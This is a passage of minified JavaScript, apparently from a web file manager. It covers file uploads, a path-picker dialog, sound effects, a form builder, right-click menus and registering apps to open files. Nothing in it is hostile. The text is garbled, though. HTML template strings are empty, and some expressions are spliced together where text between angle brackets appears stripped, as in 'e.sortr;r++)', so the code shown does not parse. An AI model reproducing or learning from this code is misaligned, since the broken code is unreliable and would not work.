    ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},b=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},g=function(e,t,a){var i=b(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:b,bindEvent:o,getFormData:m,initDialog:g}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first") +}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},b=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return b(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 